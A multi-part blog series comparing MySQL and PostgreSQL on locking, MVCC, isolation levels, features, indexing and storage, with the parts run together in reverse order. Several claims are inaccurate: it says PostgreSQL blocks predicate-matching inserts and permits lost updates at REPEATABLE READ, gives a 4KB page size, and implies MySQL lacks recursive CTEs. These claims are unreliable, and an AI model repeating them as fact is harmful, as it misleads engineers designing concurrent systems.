SELECT * FROM products WHERE category = 'Electronics' FOR UPDATE;

PostgreSQL blocks:

Only inserts where category = 'Electronics'
Inserts with other categories proceed freely

The advantage: Higher concurrency because only actual predicate matches get blocked. If your query was WHERE category = 'Electronics' AND price > 100, PostgreSQL only blocks inserts matching both conditions.

The Key Difference:

Aspect	MySQL (Gap Locking)	PostgreSQL (Predicate Locks)
Locking Scope	🔴 Range-based - Locks index gaps, may block unrelated inserts	🟢 Predicate-based - Only locks rows matching WHERE clause
Blocking Behavior	Blocks inserts in or near locked range, even outside query conditions	Blocks only inserts that match the exact query predicate
Concurrency Impact	Lower - Can block logically unrelated operations	Higher - Only blocks actual conflicts
Example	Query `WHERE date BETWEEN '2024-02-01' AND '2024-06-30'` may block insert at `2024-01-31` (adjacent gap)	Same query only blocks inserts matching both date range AND other conditions

Example Scenario:

-- Lock contracts: WHERE start_date BETWEEN '2024-02-01' AND '2024-06-30' AND office_id = 1

Insert Attempt	MySQL Gap Locking	PostgreSQL Predicate Locks
`office_id=1, date='2024-03-15'`	❌ BLOCKS (in range)	❌ BLOCKS (matches predicate)
`office_id=1, date='2024-01-31'`	❌ BLOCKS (adjacent gap)	✅ SUCCEEDS (outside date range)
`office_id=2, date='2024-03-15'`	✅ SUCCEEDS (different office)	✅ SUCCEEDS (different office)

Bottom Line: MySQL's gap locks are pessimistic and broader (blocking adjacent ranges), while PostgreSQL's predicate locks are precise (only blocking exact predicate matches). This makes PostgreSQL more concurrent at REPEATABLE READ level.

3. MVCC and Transaction Isolation

Note: For detailed MVCC storage implementation, see Part 2: Storage Architecture, Section 3.

Both databases use MVCC (Multi-Version Concurrency Control) to enable concurrent transactions, but their different MVCC implementations directly impact transaction isolation behavior. Understanding how MVCC affects transactions helps explain why certain isolation anomalies occur.

How MVCC Enables Isolation

MVCC allows readers to see consistent snapshots of data without blocking writers. The key question: When does a transaction see changes made by other transactions?

MySQL's Approach:

Uses undo log to reconstruct old row versions
At REPEATABLE READ: Creates a consistent snapshot at first read
Readers see the snapshot, even if other transactions commit changes
Writers acquire locks, creating potential blocking

PostgreSQL's Approach:

Uses tuple versioning with transaction IDs
At REPEATABLE READ: Creates a snapshot at transaction start
Readers see the snapshot, completely isolated from concurrent changes
Writers don't block readers (true snapshot isolation)

Transaction Behavior Implications

Scenario: Two concurrent transactions updating the same row

Event	MySQL (REPEATABLE READ)	PostgreSQL (REPEATABLE READ)
T1: BEGIN	Snapshot created on first read	Snapshot created at BEGIN
T1: SELECT balance	Sees 1000, creates snapshot	Sees 1000
T2: UPDATE balance = 900	T2 acquires row lock	T2 proceeds
T2: COMMIT	Lock released	Commits successfully
T1: SELECT balance again	Still sees 1000 (snapshot)	Still sees 1000 (snapshot)
T1: UPDATE balance = 800	Must wait if T2 holds lock	Proceeds, creates new version

Key Difference: PostgreSQL's tuple versioning allows both transactions to proceed without blocking, potentially leading to lost updates. MySQL's locking approach blocks T1's UPDATE until T2 commits.

Why This Matters for Isolation Levels

The MVCC implementation explains why:

Both prevent phantom reads at REPEATABLE READ - MySQL uses gap locks, PostgreSQL uses snapshots
Both allow write-skew at REPEATABLE READ - Neither detects cross-row constraint violations
PostgreSQL's SSI at SERIALIZABLE is more powerful - Tuple versioning enables dependency tracking
MySQL requires more explicit locking - Undo log approach is coupled with pessimistic locking

Bottom Line: MVCC isn't just about storage—it fundamentally shapes how transactions interact. MySQL's undo log approach favors predictability through locking. PostgreSQL's tuple versioning favors concurrency but requires VACUUM maintenance.

4. SERIALIZABLE Isolation: Pessimistic vs Optimistic Strategies

💡 Key Insight: This is the ultimate showdown! 🥊 At SERIALIZABLE isolation level, the philosophical differences between MySQL and PostgreSQL reach their peak. MySQL is the bouncer who doesn't let anyone suspicious near the door (pessimistic locking). PostgreSQL is the cool host who lets everyone in, then kicks out troublemakers at the end (optimistic SSI). MySQL says "better safe than sorry," while PostgreSQL says "let's roll the dice and see what happens!" Both approaches work—just depends on whether you prefer blocking or retrying.

SERIALIZABLE is the strictest isolation level—it guarantees that concurrent transactions produce the same result as if they ran one at a time, in some serial order. Sounds great, right? The catch is how you achieve this. Both databases get there, but the experience is totally different.

Note: For detailed locking mechanisms, see Section 2.3.

The Key Differences

Aspect	MySQL (Pessimistic)	PostgreSQL (Optimistic - SSI)
Strategy	Block conflicts before they happen	Detect conflicts at commit time
SELECT Behavior	Plain SELECTs become `SELECT ... FOR SHARE` (acquire shared locks)	Plain SELECTs don't acquire locks
Blocking Point	Early - On reads (FOR UPDATE/FOR SHARE)	Late - On commit (conflict detection)
Concurrency	❌ Lower - Extensive blocking	✅ Higher - Concurrent execution allowed
Transaction Failures	✅ Rare (blocking prevents conflicts)	❌ More common (serialization errors)
Write-Skew Detection	❌ No - Only prevents through blocking	✅ Yes - SSI detects and aborts
Application Code	✅ Simpler (no retry logic)	❌ More complex (must handle retries)

What this means in practice:

When you run transactions at SERIALIZABLE in MySQL, even plain SELECT statements automatically acquire shared locks (as if you wrote SELECT ... FOR SHARE). This means Transaction 2 trying to read what Transaction 1 is reading? Blocked. Transaction 2 trying to update what Transaction 1 read? Blocked. Everything waits politely in line.

PostgreSQL does the opposite. Transactions run freely, reading and writing concurrently. PostgreSQL's SSI (Serializable Snapshot Isolation) tracks dependencies between transactions. Only at commit time does PostgreSQL ask: "Would this ordering violate serializability?" If yes, one transaction gets aborted with a serialization error. If no, everyone commits happily.

This is why PostgreSQL can detect write-skew anomalies (remember the doctor scheduling problem?) while MySQL can't—SSI is smart enough to see the dangerous pattern. MySQL just blocks aggressively and hopes for the best.

Behavior Comparison

Scenario: Two concurrent transactions reading and updating different rows

Event	MySQL SERIALIZABLE	PostgreSQL SERIALIZABLE
T1: SELECT	Acquires shared locks	No locks, proceeds
T2: SELECT FOR UPDATE	❌ BLOCKS waiting for T1	✅ Proceeds concurrently
T1: UPDATE + COMMIT	Completes, T2 unblocks	Completes
T2: UPDATE + COMMIT	Completes after wait	May ABORT if SSI detects conflict

The Trade-off

Choose MySQL When	Choose PostgreSQL When
✅ Need predictable behavior (rare failures)	✅ Need maximum concurrency
✅ Want simpler application code (no retries)	✅ Need write-skew detection
✅ Low contention workload	✅ Have retry logic implemented
✅ Can tolerate blocking delays	✅ High-contention workload benefits from optimism

Bottom Line: MySQL = fewer failures but more blocking. PostgreSQL = more failures but higher throughput.

Part 3 - MySQL vs PostgreSQL: Features & Capabilities Comparison

Harry Do — Sat, 18 Oct 2025 09:26:54 +0000

1. Philosophy & Design Principles: The Core DNA
2. Standards Compliance: SQL Standard Adherence
3. Data Types & Flexibility
4. Indexing Capabilities: Different Strategies for Different Needs
5. Index Scan Types: How They Actually Find Your Data
6. Views Support: Real-Time vs Pre-Computed
7. Security Features: Locking Down Your Data
Wrapping Up

Alright, let's get into the nitty-gritty differences between MySQL and PostgreSQL. It's time to see how their core philosophies and features actually play out in the real world.

1. Philosophy & Design Principles: The Core DNA

💡 Key Insight: Understanding the fundamental design philosophies helps predict how each database will behave in different scenarios. Think of it as getting to know someone's personality before you start working together.

Here's the thing: MySQL and PostgreSQL were born with different goals in mind, and you can see it in every decision they make.

1.1 MySQL: The "Keep It Simple, Keep It Fast" Approach

Core Principle: "Speed, Simplicity, and Reliability"

MySQL is like that friend who always shows up on time, doesn't complicate things, and just gets the job done. It's engineered to be fast and straightforward, making it the go-to choice for web applications where you're mostly reading data and want things to just work.

What MySQL Really Cares About:

⚡ Performance First: It's optimized for speed and quick response times—MySQL wants to be the fastest kid on the block
🎯 Simplicity: Easy to set up, configure, and maintain—no PhD required
🔒 Reliability: Stable and dependable for production workloads—it won't randomly flake out on you
📚 Ease of Use: Minimal learning curve—you can be productive in an afternoon

1.2 PostgreSQL: The "Power User's Swiss Army Knife" Approach

Core Principle: "Extensibility, Standards Compliance, and Data Integrity"

PostgreSQL is like that overachieving friend who's prepared for everything. It's designed to be the most feature-rich, standards-compliant, and robust system possible. If MySQL is a reliable Honda Civic, PostgreSQL is a fully-loaded Tesla with every bell and whistle you can imagine.

What PostgreSQL Really Cares About:

🔧 Extensibility: Highly customizable and extensible architecture—you can make it do almost anything
📏 Standards Compliance: Strict adherence to SQL standards—it's the teacher's pet of databases
🛡️ Data Integrity: Robust ACID compliance and transaction support—your data is safe
⭐ Advanced Features: Rich set of advanced database features—it's like getting 10 databases in one

2. Standards Compliance: SQL Standard Adherence

PostgreSQL has consistently maintained strong adherence to SQL standards, while MySQL has historically taken a more pragmatic approach, prioritizing practicality over strict compliance. However, recent MySQL versions have significantly improved in this area.

MySQL 8.4: Improved SQL Compliance

MySQL 8.4 has made substantial progress in SQL standards compliance. Key improvements include:

Window functions for advanced analytical queries
Common Table Expressions (CTEs) for more readable and maintainable queries
Comprehensive JSON functions and operators
Atomic DDL operations and improved error handling for safer schema changes

However, some advanced SQL features remain limited or unavailable compared to PostgreSQL, including partial indexes, fully recursive CTEs, and certain SQL:2011+ constructs.

PostgreSQL 17: Comprehensive Standards Support

PostgreSQL maintains the highest level of SQL standards compliance among open-source databases:

Full support for window functions and CTEs, including recursive queries
Partial and expression-based indexes for optimized query performance
Advanced full-text search capabilities
Extensive JSON/JSONB operators and indexing support
Strict adherence to ANSI SQL standards with early adoption of new features

3. Data Types & Flexibility

PostgreSQL and MySQL take fundamentally different approaches to data type support. MySQL focuses on standard SQL types with broad compatibility, while PostgreSQL provides an extensive type system designed for specialized use cases.

Data Type Category	MySQL 8.4	PostgreSQL 17
JSON Support	🟡 Good - Binary storage, functional indexes	🟢 Superior - JSONB, GIN indexes, JSON_TABLE()
Array Support	🔴 None - JSON arrays or normalized tables	🟢 Native - True arrays with rich operators
Custom Types	🔴 Limited - Basic ENUM only	🟢 Extensive - Composite, enum, domain types
Range/Interval	🔴 Manual - Separate start/end columns	🟢 Native - TSRANGE, DATERANGE with operators
Geospatial	🟡 Basic - Simple geometry functions	🟢 Advanced - PostGIS extension, full GIS
Network Types	🔴 None - Store as VARCHAR	🟢 Native - INET, CIDR with validation
UUID Support	🟡 Manual - CHAR(36) or BINARY(16)	🟢 Native - Dedicated type with functions
Learning Curve	🟢 Simple - Familiar SQL types	🔴 Complex - Many specialized options

JSONB: A Game-Changer for Unstructured Data

PostgreSQL's JSONB support stands out as a critical differentiator, particularly for applications dealing with unstructured or semi-structured data. This capability can eliminate the need for maintaining a separate document database for many use cases with moderate complexity.

Key Advantages of PostgreSQL JSONB:

Native Binary Storage: JSONB stores data in a decomposed binary format, enabling efficient querying and indexing without parsing overhead
GIN Indexing: Generalized Inverted Index (GIN) support allows fast lookups on JSON properties and containment operations
Rich Operators: Comprehensive set of operators for querying, filtering, and manipulating JSON data directly in SQL
Type Safety: Validates JSON structure while maintaining flexibility for schema-less data
Query Performance: Eliminates the overhead of maintaining synchronization between a relational database and a separate document store

Practical Implications:

When your application requires both structured relational data and flexible document-like storage, PostgreSQL's JSONB allows you to handle both within a single database system. This reduces architectural complexity, eliminates data synchronization issues, and simplifies your infrastructure.

For simple to moderate unstructured data requirements, PostgreSQL can effectively replace a dedicated document database like MongoDB, providing the benefits of both relational and document-oriented approaches in one system.

MySQL's JSON Support:

MySQL 8.4 provides functional JSON support with binary storage and path-specific indexing, which is adequate for basic JSON storage and retrieval. However, it lacks the comprehensive indexing capabilities and rich operator set that PostgreSQL offers, making it less suitable for heavy JSON querying workloads.

4. Indexing Capabilities: Different Strategies for Different Needs

This is where things get really interesting. MySQL and PostgreSQL have fundamentally different indexing philosophies, and understanding these differences will save you a lot of headaches.

Indexing Aspect	MySQL 8.4	PostgreSQL 17
Index Architecture	🔵 Clustered - Data stored in PK order	🟡 Heap - Data stored separately from indexes
Index Types	🔴 Limited - Primarily B-tree + JSON functional	🟢 Extensive - B-tree, GIN, GiST, BRIN, partial, expression
Primary Key Access	🟢 Exceptional - Direct clustered access	🟡 Good - Index + heap lookup
Complex Queries	🟡 Limited - B-tree optimization only	🟢 Excellent - Specialized indexes for any pattern
Configuration	🟢 Simple - Automatic optimization	🔴 Complex - Requires index type selection
Random Inserts	🔴 Slower - Clustered hotspots	🟢 Consistent - No clustering overhead
JSON Indexing	🟡 Functional - Path-specific indexes	🟢 Advanced - GIN indexes on entire documents
Partial Indexes	🔴 None - Must index entire column	🟢 Native - Index only matching conditions
Expression Indexes	🟢 Full Support - Functional indexes on any expression (8.0.13+)	🟢 Full support - Any computed expression

💡 For deeper understanding: To fully grasp how index scans work and why these differences matter, refer to Part 2 - Data Storage where we explore the underlying storage architectures (clustered vs heap-based storage) that drive these indexing behaviors.

5. Index Scan Types: How They Actually Find Your Data

Here's where the rubber meets the road. Both databases can scan indexes, but they do it in their own special ways.

Scan Type	MySQL 8.4	PostgreSQL 17
Index Scan	🟢 Standard - B-tree traversal to find rows	🟢 Standard - B-tree traversal to find rows
Index Only Scan	🟡 Covering Index - Secondary index with INCLUDE-like behavior	🟢 Native - Index-only scan without heap access
Bitmap Scan	🔴 None - Uses range or index merge	🟢 Advanced - Bitmap heap scan for multiple conditions
Sequential Scan	🟢 Full Table - Reads all table pages	🟢 Full Table - Reads all table pages
Index Range Scan	🟢 Efficient - Range queries on clustered/secondary indexes	🟢 Efficient - Range queries with heap lookups
Parallel Scans	🟡 Basic - Parallel query execution (8.0+)	🟢 Advanced - Parallel index, bitmap, and sequential scans

The Bitmap Scan Deep Dive

Bitmap Scan (PostgreSQL's Secret Weapon)

PostgreSQL's bitmap scan is one of those features that makes database nerds weep with joy. It's a sophisticated strategy for handling complex WHERE clauses with multiple conditions, and it's something MySQL simply doesn't have.

How Bitmap Scan Actually Works:

Let's say you have this query:

-- Query with multiple conditions
SELECT * FROM orders
WHERE customer_id = 123
AND order_date >= '2024-01-01'
AND status = 'pending';

-- PostgreSQL execution plan:
-- 1. Bitmap Index Scan on idx_customer (customer_id = 123)
-- 2. Bitmap Index Scan on idx_date (order_date >= '2024-01-01')
-- 3. Bitmap Index Scan on idx_status (status = 'pending')
-- 4. BitmapAnd: Combine all bitmaps using AND operation
-- 5. Bitmap Heap Scan: Access heap pages only for matching rows

Why Bitmap Scans Are So Cool:

Multiple Index Combination: Efficiently combines multiple indexes using bitmap operations—it's like magic
Reduced Heap Access: Only accesses heap pages that contain matching rows—no wasted I/O
Memory Efficient: Bitmap representation is compact compared to storing all row pointers
Complex Conditions: Handles OR, AND combinations of multiple indexes seamlessly—handles whatever you throw at it

What MySQL Does Instead:

-- MySQL uses index intersection or chooses best single index
-- Option 1: Index intersection (limited support)
SELECT * FROM orders
WHERE customer_id = 123 AND order_date >= '2024-01-01';

-- Option 2: Query optimizer chooses single best index
-- Typically uses idx_customer, then filters remaining conditions

6. Views Support: Real-Time vs Pre-Computed

View Feature	MySQL 8.4	PostgreSQL 17
Standard Views	🟢 Full Support - Dynamic query execution	🟢 Full Support - Dynamic query execution
Materialized Views	🔴 None - Must use tables + triggers	🟢 Native - Pre-computed and stored results
View Updates	🟡 Limited - Simple views only	🟢 Advanced - Complex views with rules
Refresh Options	🔴 Manual - Application-level logic	🟢 Flexible - Manual, automatic, incremental
Performance	🔴 Query-dependent - No caching mechanism	🟢 Optimized - Materialized views cache results
Storage Overhead	🟢 Minimal - Views are just queries	🔴 Higher - Materialized views require storage

Why Materialized Views Matter

Materialized Views are a game-changer for analytical workloads and complex reporting. PostgreSQL's native support for materialized views provides a significant advantage over MySQL in scenarios where you need to optimize expensive, frequently-accessed queries.

What Makes Materialized Views Special:

Pre-computed Results: Instead of executing a complex query every time, the results are computed once and stored physically on disk
Indexable: You can create indexes on materialized views, making them as fast as regular tables for subsequent queries
Flexible Refresh: Choose when to refresh—manually on-demand, scheduled via cron, or automatically with triggers
Perfect for Analytics: Dashboards, reports, and analytical queries that aggregate millions of rows can return instantly instead of taking seconds or minutes

Real-World Impact:

Imagine a dashboard that shows sales analytics by aggregating millions of transactions. With standard views in MySQL, this query runs every time someone loads the dashboard. With PostgreSQL's materialized views, you compute it once (say, every hour), and all dashboard accesses are instant—just reading pre-computed data.

MySQL's Workaround:

Without native materialized views, MySQL users must manually create summary tables, write triggers or scheduled jobs to keep them updated, and implement their own refresh logic. This is error-prone, harder to maintain, and requires significant application-level code.

7. Security Features: Locking Down Your Data

Security Feature	MySQL 8.4	PostgreSQL 17
Authentication Methods	🟡 Multiple - Native, LDAP, PAM plugins	🟢 Extensive - Native, LDAP, Kerberos, RADIUS, etc.
Row-Level Security	🔴 None - Application-level implementation required	🟢 Native - Built-in row-level security policies
Column Encryption	🟡 Basic - Transparent data encryption (TDE)	🟢 Advanced - Column-level encryption with pgcrypto
SSL/TLS Support	🟢 Full - Complete SSL/TLS implementation	🟢 Full - Complete SSL/TLS implementation
Audit Logging	🟡 Enterprise - Available in commercial version	🟢 Open Source - pg_audit extension available
User Management	🟢 Standard - Role-based access control	🟢 Advanced - Sophisticated role hierarchy
Data Masking	🟡 Enterprise - Commercial feature	🟢 Community - Available through extensions
Compliance Features	🟡 Enterprise-focused - Commercial compliance tools	🟢 Built-in - Strong compliance capabilities

PostgreSQL's Row-Level Security: A Nice Addition

PostgreSQL offers native row-level security (RLS), allowing you to define security policies directly in the database that automatically filter rows based on the user. MySQL requires implementing this in application code if needed.

The Trade-off: Both databases provide solid security fundamentals. PostgreSQL includes more advanced security features in the open-source edition, while MySQL reserves some advanced features for the commercial Enterprise Edition.

Wrapping Up

Design Philosophy Summary

Priority	MySQL 8.4	PostgreSQL 17
Primary Focus	Performance & Simplicity	Features & Standards Compliance
Target Use Case	Web applications, read-heavy workloads	Complex applications, analytics, data integrity
Philosophy	Pragmatic, get it done fast	Academic, do it right by the standard
Learning Curve	Low - productive quickly	Moderate - more to learn
Configuration	Minimal - sensible defaults	Flexible - tuning options available

Both are excellent databases. Choose based on your workload characteristics and team expertise, not on what's "better" in the abstract.

Part 2 - MySQL vs PostgreSQL: Storage Architecture

Harry Do — Tue, 14 Oct 2025 10:31:14 +0000

MySQL and PostgreSQL take fundamentally different approaches to data storage. MySQL (InnoDB) uses a clustered index architecture where table data is physically organized around the primary key, while PostgreSQL uses heap storage where data is stored unordered and all indexes are secondary. This architectural difference profoundly impacts insert performance, query patterns, index design, and maintenance requirements. Understanding these storage models is crucial for optimizing database performance and making informed indexing decisions.

1. MySQL: The Clustered Index Approach

MySQL's InnoDB storage engine automatically organizes your table data around the primary key using a clustered index. Think of it like a dictionary where entries are automatically sorted alphabetically — the data itself is stored in order, making lookups by the primary key incredibly fast, but inserting new entries in random order requires shifting things around.

How Clustered Indexes Work:

Primary Key Clustering: InnoDB automatically creates a clustered index on the primary key — this isn't optional, it's the foundation of how InnoDB stores data. If you don't define a primary key, InnoDB will use the first UNIQUE index with all NOT NULL columns. If no suitable index exists, InnoDB generates a hidden 6-byte row ID (GEN_CLUST_INDEX) as the clustered index
Data Storage: Table data is physically stored in primary key order, with the actual row data living in the leaf nodes of the B-tree index structure. The non-leaf pages of the B-tree contain index keys and pointers to other pages, while the leaf pages contain the complete row data including all columns
Secondary Indexes: Each secondary index entry contains the indexed column(s) plus a copy of the primary key value. When you query using a secondary index, InnoDB first searches the secondary index to find the primary key value, then uses that primary key to search the clustered index to retrieve the full row data — a two-step lookup process (secondary index → primary key value → clustered index → row data). This is why keeping primary keys small is crucial — every secondary index stores a copy of it
Index Structure: The clustered index B-tree is typically 2-4 levels deep, with data pages themselves forming the leaf level. This means primary key lookups require only 2-4 disk/memory page accesses to reach the actual data

The Good Stuff:

Lightning Fast Primary Key Lookups: Direct access to data without any additional lookup step
Exceptional Range Queries: Sequential primary key reads are incredibly fast since data is physically ordered
Storage Efficiency: Data is stored at the index leaf level, eliminating the need for separate data storage
Automatic Optimization: No configuration required—InnoDB handles everything for you
Smaller Secondary Indexes: Secondary indexes store primary key values instead of row pointers, which can be more efficient for small primary keys

The Not-So-Good:

Random Insert Pain: Non-sequential primary keys (like UUIDs) cause frequent page splits and reorganization
Secondary Index Overhead: Every secondary index lookup requires two steps—first finding the primary key, then looking up the data (unless you use covering indexes that include all needed columns, which eliminates the second lookup)
Hotspot Issues: High concurrency inserts on sequential keys (like auto-increment IDs) create contention at the "hot" end of the index. Modern MySQL versions (5.7+) mitigate this with "consecutive" lock mode using lightweight mutexes instead of table-level locks, but some contention remains under very high concurrency
Table Fragmentation: Random inserts can fragment clustered data over time, degrading performance
Large Primary Keys Are Costly: Since every secondary index stores the primary key, large primary keys (like UUIDs) bloat all your indexes

2. PostgreSQL: The Heap Storage Approach

PostgreSQL uses heap storage, which means your data is stored in whatever order it arrives, there's no automatic physical ordering. Think of it like throwing papers into a filing cabinet in any order, then using index cards to find what you need. Every index, including the primary key, is just a pointer to the actual location in the heap.

How Heap Storage Works:

No Clustered Indexes: PostgreSQL uses heap storage where data is not physically ordered by default. New rows are inserted into any available space in the table (typically at the end, but also in gaps left by deleted rows if there's enough space)
All Indexes Are Secondary: Every index, including the primary key, points directly to heap tuple locations using a TID (Tuple Identifier). A TID consists of two components: a block number (which 4KB page in the table file) and an offset number (which slot within that page). For example, TID (5,3) means block 5, slot 3
Index Structure: All indexes are completely separate from data storage, each maintaining their own B-tree structures. An index lookup retrieves the TID, then PostgreSQL uses that TID to directly fetch the row from the heap table by reading the specific block and slot
CLUSTER Command: You can manually reorder table data by an index using the CLUSTER command, but it's a one-time operation that doesn't persist as new data arrives. PostgreSQL must rewrite the entire table to cluster it, acquiring an ACCESS EXCLUSIVE lock that blocks all operations during the process

The Good Stuff:

Consistent Insert Performance: No clustering overhead regardless of key pattern — random or sequential, it doesn't matter
Direct Index Access: All indexes point directly to heap locations with a single lookup
Better Concurrent Inserts: No hotspot issues with sequential keys since there's no physical ordering to maintain
Flexible Access Patterns: All columns have equal access performance—no column is "special" like the primary key in MySQL
No Page Split Drama: Inserts don't cause the reorganization headaches that clustered indexes do

The Not-So-Good:

Primary Key Overhead: Even primary key lookups require index traversal + heap access (two steps)
No Automatic Clustering: Cannot automatically take advantage of physical ordering for range queries
Larger Storage Footprint: Separate index and heap storage means more disk space used
More Index Maintenance: All indexes require separate maintenance — when you update a single row, this is what happens:
- The old version of the row is marked as "dead"
- A new version of the row is inserted elsewhere in the table with a new physical address (TID)
- All indexes on the table must be updated to point to this new location
- Important exception: PostgreSQL's HOT (Heap-Only Tuple) optimization can avoid index updates when: (1) no indexed columns are modified, AND (2) there's enough free space in the same block to store the new tuple. In this case, the old tuple points to the new tuple within the same page, and indexes don't need updating. However, HOT updates only work when these conditions are met — any update to an indexed column or when the block is full requires updating all indexes
VACUUM Dependency: Requires regular VACUUM operations to reclaim space from dead tuples (more on this below)

3. MVCC: How Each Database Handles Concurrent Access

Both MySQL and PostgreSQL use MVCC (Multi-Version Concurrency Control) to allow simultaneous reads and writes without extensive locking. MVCC works by keeping multiple versions of data rows so that readers can access old versions while writers create new ones. However, the two databases implement this completely differently — MySQL uses a separate undo log, while PostgreSQL stores versions directly in the table.

What Is MVCC?

MVCC is a strategy that allows databases to handle concurrent access without locking readers. Instead of overwriting data, the database keeps old versions around so that ongoing transactions can still see the data as it existed when they started. This requires:

Keeping old versions of data instead of simply overwriting it
When a row is updated, preserving the original data as an older version while creating a new version
A mechanism to manage these different row versions
Eventual cleanup of old versions once no active transaction needs them

3.1. MySQL (InnoDB): Undo Log Approach

MySQL's InnoDB storage engine implements MVCC using a separate undo log — a dedicated space outside the main table where old row versions are stored. Think of it like keeping a separate notebook for your editing history while your main document always shows the latest version.

How InnoDB's Undo Log Works:

In-Place Updates: When you update a row, InnoDB modifies the row directly in the main table (the clustered index). The current row in the clustered index always represents the latest committed version
Hidden System Columns: InnoDB adds three hidden fields to each row:
- DB_TRX_ID (6 bytes): Transaction ID of the transaction that last inserted or updated the row
- DB_ROLL_PTR (7 bytes): Roll pointer that points to the undo log record containing the previous version
- DB_ROW_ID (6 bytes): Row ID that increases monotonically (only if no primary key is defined)
Undo Log Storage: The old version of the data is written to a separate undo log tablespace, not the main table. Undo logs are organized into rollback segments and can be stored in system tablespace or separate undo tablespaces
Version Reconstruction: When a transaction needs to see an older version (based on its read view/snapshot), InnoDB follows the DB_ROLL_PTR chain in the undo log to reconstruct the row as it existed at the required point in time. This may require following multiple undo log records if there were multiple updates
Automatic Cleanup: Background "purge" threads (configurable via innodb_purge_threads, up to 32 threads) automatically clean the undo log once no active transaction needs those old versions. Purge threads also physically remove delete-marked rows from indexes
Selective Index Updates: Only indexes affected by the update need to be modified. For secondary indexes, if the indexed column didn't change, the index entry doesn't need updating

The Good Stuff:

Clean Main Table: Your main table only stores the current version, keeping it compact
Automatic Maintenance: No manual intervention needed—purge threads handle cleanup automatically
Faster Updates: Updates are generally faster because only affected indexes need updating
Predictable Performance: The undo log is a separate structure with dedicated cleanup processes
Efficient Rollback: Rolling back transactions is fast since old versions are readily available

The Not-So-Good:

Undo Log Growth: Long-running transactions can cause the undo log to grow extremely large
Undo Log Contention: Heavy write workloads can create contention on undo log access
Delayed Cleanup: Long-running read transactions prevent purge threads from cleaning up old versions
Hidden Storage Costs: The undo log can consume significant disk space during peak periods
Tablespace Management: You need to monitor and potentially resize the undo tablespace

3.2. PostgreSQL: Tuple Versioning Approach

PostgreSQL implements MVCC by storing multiple versions of rows directly in the main table itself—a technique called tuple versioning. Think of it like keeping all your document revisions in the same file, with markers showing which version is current and which are old.

How PostgreSQL's Tuple Versioning Works:

Full Row Copies: When you update a row, PostgreSQL creates a completely new copy of the entire row in the table. This is a full physical copy with all columns, not just the changed values
In-Table Storage: Both the old version (now "dead") and the new version live in the same table file, side by side. Dead tuples remain in place until VACUUM removes them
Transaction Visibility Fields: Each tuple header contains critical visibility information:
- xmin: Transaction ID that inserted this tuple (when the row version was created)
- xmax: Transaction ID that deleted or updated this tuple (0 if still current)
- t_ctid: Points to the newer version of the row if updated, or to itself if it's the current version
- These fields determine which transactions can see this tuple based on their snapshot isolation level
Visibility Rules: A tuple is visible to a transaction if:
- The inserting transaction (xmin) has committed and is in the transaction's snapshot
- AND the deleting transaction (xmax) has not committed or is not in the transaction's snapshot
All Index Updates: Since the new row has a different physical location (TID), all indexes on the table must be updated to point to the new location (except in HOT update cases)
VACUUM Cleanup: A VACUUM process (manual or autovacuum) eventually removes dead tuples and reclaims space. VACUUM scans the table, identifies tuples where all active transactions have moved past their xmax, and marks that space as reusable

The Good Stuff:

Simple Architecture: Everything is in one place—no separate undo log to manage
No Version Reconstruction: Old versions are complete rows, no need to reconstruct from logs
Predictable Read Performance: Reading old versions is straightforward since they're complete tuples
Better for Short Transactions: Works well when transactions are short and VACUUM can keep up
Core Database Feature: MVCC is deeply integrated into PostgreSQL's architecture

The Not-So-Good:

Table Bloat: Dead tuples accumulate in the table, causing it to grow and degrade performance
Index Bloat: All indexes also bloat because they contain pointers to dead tuples
VACUUM Dependency: Performance is highly dependent on proper VACUUM tuning and frequency
All Indexes Updated: Every update requires updating every index on the table, regardless of which columns changed
Write Amplification: A single row update creates a full new copy of the row plus updates all indexes
Manual Tuning Required: You need to carefully tune autovacuum settings for write-heavy workloads

3.3. MVCC Comparison: Side by Side

MVCC Feature	MySQL (InnoDB)	PostgreSQL
Implementation	Undo Log - Engine-specific, separate from table	Tuple Versioning - Core architecture, in-table
Update Method	In-place modification, old data to undo log	Full new row copy, old version marked dead
Version Storage	Separate undo log space	Within the main table file
Old Version Format	Delta/changes only	Complete row copy
Cleanup Mechanism	Automatic background purge threads	VACUUM process (autovacuum or manual)
Index Updates per Update	Only affected indexes	All indexes on the table
Main Storage Impact	Main table stays compact	Table grows with dead tuples
Maintenance Requirement	Minimal (mostly automatic)	Requires VACUUM tuning
Bloat Risk	Undo log can grow large	Table and all indexes can bloat
Best For	Mixed workloads, long transactions	Short transactions, read-heavy workloads

Why This Matters:

Understanding these MVCC differences is crucial for performance tuning:

MySQL's Challenge: Long-running transactions prevent undo log cleanup, causing the undo log to grow indefinitely. Monitor your slowest queries and transactions to prevent this.
PostgreSQL's Challenge: Write-heavy workloads create dead tuples faster than autovacuum can clean them, leading to severe bloat. You need aggressive autovacuum tuning (lower autovacuum_vacuum_scale_factor, higher autovacuum_max_workers) and potentially manual VACUUM during maintenance windows.
Design Impact: In PostgreSQL, avoid adding unnecessary indexes since every index adds overhead on updates. In MySQL, be mindful of long-running read transactions that hold up undo log cleanup.

4. Key Takeaways: Side-by-Side Comparison

Factor	MySQL (Clustered Index)	PostgreSQL (Heap Storage)
Data Organization	Physically ordered by primary key	Unordered heap storage
Primary Key Lookup	Single step (direct access)	Two steps (index + heap)
Secondary Index Lookup	Two steps (index → PK → data)	Single step (index → heap)
Insert Performance	Sequential fast, random slow	Consistent regardless of pattern
Range Query Performance	Excellent on primary key	Good on any indexed column
Storage Space	More efficient (data in index)	Larger (separate index + heap)
Update Overhead	Only affected indexes updated	All indexes must be updated (except HOT updates)
Primary Key Choice	Critical (affects all indexes)	Less critical (just another index)
MVCC Implementation	Undo log (separate from table)	Tuple versioning (in table)
Maintenance	Automatic purge	Requires VACUUM tuning
Best For	Primary key access, range queries	Flexible access patterns, heavy writes

Bottom Line:

MySQL's clustered index architecture is optimized for primary key access and provides excellent performance for sequential inserts and primary key range queries, but requires careful primary key design and suffers with random inserts.
PostgreSQL's heap storage provides consistent insert performance and flexible access patterns, but requires all indexes to be updated on row changes (except for HOT updates) and needs proper VACUUM maintenance to prevent bloat.

Choose based on your access patterns, primary key characteristics, and operational requirements.

Part 1 - MySQL vs PostgreSQL: Connection Architecture

Harry Do — Tue, 14 Oct 2025 09:48:17 +0000

Part 1 - MySQL vs PostgreSQL: Connection Architecture

MySQL and PostgreSQL take fundamentally different approaches to handling client connections. MySQL uses a thread-based architecture where all connections share a single process, while PostgreSQL uses a process-based architecture where each connection gets its own dedicated process. This architectural difference has cascading effects on memory usage, connection scalability, performance characteristics, and why connection pooling is optional for MySQL but essential for PostgreSQL in production environments.

